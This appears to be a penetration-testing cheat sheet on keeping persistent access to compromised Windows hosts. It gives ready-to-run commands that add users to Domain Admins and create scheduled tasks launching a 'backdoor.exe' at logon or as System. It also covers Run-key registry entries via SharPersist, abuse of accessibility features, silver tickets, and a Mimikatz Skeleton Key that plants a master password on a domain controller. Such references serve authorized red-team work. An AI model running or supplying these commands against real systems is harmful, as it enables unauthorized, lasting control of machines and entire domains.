# Windows

## Guides

3 good guides:

* <https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-1-microsoft-office/>
* <https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-2-com-hijacking/>
* <https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-3-wmi-event-subscription/>

## Add User

Commands:

`net user "username" "password" /ADD`&#x20;

`net group "Domain Admins" %username% /DOMAIN /ADD`&#x20;

Change user password&#x20;

`net user USERNAME *`&#x20;

Using Powershell:

`Add-LocalGroupMember -Group Administrators -Member hacker`

## Scheduled task

### SharpPresist

<https://github.com/fireeye/SharPersist>&#x20;

Create a Scheduled task:&#x20;

`Execute-assembly ~/Downloads/SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c echo 123 >> c:\123.txt" -n "Some Task" -m add -o hourly`&#x20;

Or&#x20;

`SharPersist -t schtask -c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" -a "C:\Users\John\msbuild.csproj" -n "Test" -m add -o hourly`&#x20;

Delete a Scheduled task:&#x20;

`SharPersist -t schtask -n "Test" -m remove`&#x20;

### PowerShell&#x20;

```
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" 
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" 
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" 
PS C:\> $S = New-ScheduledTaskSettingsSet 
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S 
PS C:\> Register-ScheduledTask Backdoor -InputObject $D 
```

### Command Line&#x20;

`shell schtasks /create /tn Test /tr "c:\windows\system32\cmd.exe /c c:\Users\JOHN\Downloads\backdoor.exe" /sc onlogon /ru System`&#x20;

## Registry Key

### SharpPresist:&#x20;

<https://github.com/fireeye/SharPersist>&#x20;

Create a Registry Key:&#x20;

`SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add`&#x20;

Delete a Registry Key:&#x20;

`SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove`&#x20;

### Command Line&#x20;

`shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Test /t REG_SZ /d "C:\Windows\System32\cmd.exe"`&#x20;

Delete:&#x20;

`reg delete  Registry_key_path /v Registry_value_name`&#x20;

## Accessibility Features

The accessibility features provide additional options (on screen keyboards, magnifier, screen reading etc.) that could assist people with disabilities to use Windows operating systems easier. However, this functionality can be abused to achieve persistence on a host that RDP is enabled and Administrator level privileges have been obtained. This technique touches the disk, or modification of the registry is required to execute a stored remotely payload.&#x20;

<https://pentestlab.blog/2019/11/13/persistence-accessibility-features/>

## Silver Tickets

Computers change their account passwords every 30 days, but this is initialized by the client, not Active Directory. extract the host computer account hash, set a specific registry key, and you can regain access indefinitely.&#x20;

## Skeleton Key

The method injects itself into LSASS and creates a master password that will work for any account in the domain.

* The Skeleton Key only works for Kerberos RC4 encryption
* The Skeleton Key is a backdoor that runs on the Domain Controller (in memory) allows single password (the skeleton password) that can be used to log on to any account;

Run it on a DC using Mimikatz:

```
privilege::debug
misc::skeleton
```

<https://pentestlab.blog/2018/04/10/skeleton-key/>